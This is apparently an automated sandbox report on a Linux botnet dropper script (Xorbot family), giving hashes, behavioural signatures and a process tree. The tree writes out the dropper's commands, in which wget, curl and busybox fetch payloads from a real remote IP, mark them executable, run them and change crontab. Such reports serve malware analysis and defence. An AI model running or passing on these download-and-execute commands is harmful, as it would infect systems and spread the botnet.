Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-12-2024 02:15
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
1da16902d7c5601131994e6c7188579b
-
SHA1
66658b1510c47b2293d64f6f29ffadfaac1ba126
-
SHA256
a527f457c05c52627d9ac88b3fb6f7dd65b7de796e8c1bab1d761c3dd2a83dc6
-
SHA512
c9959bb121b46e0ff62f2750ea6927810ae204a778e28ba2db6f9a2dee9b38296642c45af45fcb9f8f25c84402e45e50009c3c119db97b18d06ea84dda785fb4
-
SSDEEP
192:k2c41phAQq2Si/XdccYcXTOU1phAQkLG2Si/XU/YO:k2c41phAQq2Si/XdccYcXTOU1phAQkLC
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2058) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid Process 690 chmod 784 chmod -
Executes dropped EXE 2 IoCs
Processes:
OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B1ioc pid Process /tmp/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 691 OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 /tmp/p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B1 785 p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B1 -
Renames itself 1 IoCs
Processes:
OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5pid Process 692 OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.5K6qk0 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc Process File opened for reading /proc/cpuinfo curl -
Processes:
OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5crontabcurldescription ioc Process File opened for reading /proc/873/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/899/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/912/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/149/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/653/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/714/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/823/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/861/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/893/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/941/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/966/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/169/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/730/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/761/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/753/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/877/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/933/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/939/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/15/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/141/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/705/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/918/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/1018/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/filesystems crontab File opened for reading /proc/867/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/890/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/111/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/888/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/1000/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/945/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/962/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/996/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/929/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/951/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/1003/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/788/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/832/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/904/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/830/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/838/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/915/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/934/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/654/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/825/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/723/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/728/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/1002/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/24/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/406/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/661/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/110/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/707/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/833/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/8/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/22/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/25/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/952/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/7/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/725/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/842/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/1006/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/935/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 File opened for reading /proc/972/cmdline OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxbusyboxdescription ioc Process File opened for modification /tmp/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 wget File opened for modification /tmp/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 curl File opened for modification /tmp/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5 busybox File opened for modification /tmp/p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B1 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:656
-
/bin/rm/bin/rm bins.sh2⤵PID:660
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO52⤵
- Writes file to tmp directory
PID:666
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO52⤵
- Writes file to tmp directory
PID:688
-
-
/bin/chmodchmod 777 OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO52⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO5./OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO52⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:691 -
/bin/shsh -c "crontab -l"3⤵PID:693
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:694
-
-
-
/bin/shsh -c "crontab -"3⤵PID:695
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:696
-
-
-
-
/bin/rmrm OR4zcNWQeUM1Nmw6OqsHjIEhSBK5yFRyO52⤵PID:698
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B12⤵PID:701
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B12⤵PID:702
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B12⤵
- Writes file to tmp directory
PID:783
-
-
/bin/chmodchmod 777 p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B12⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B1./p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B12⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm p6kHJFwFoOsTXvD5czNNuOnQoZ5A6nx9B12⤵PID:787
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vOY9PxORiT1XYizjwa6iPHyapwMlonbXIA2⤵
- System Network Configuration Discovery
PID:788
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
210B
MD55f04bad6787924e2d6567369df76c1a0
SHA1d21ad6556475270e1f9a4c5e274cb09752cfbda0
SHA25670ec83b731051f0ba168468ed13977c55f4496d63e8ad763ec585ac8a4b4cb63
SHA512b2772d2142b551e2cee54f1ebd9296ed5440b8cbf955b40d54f5473617f6a3ac888ca8759fa8ad85333539a379fa1552e218b2bc01c7b21ef2ed370fe8b85b39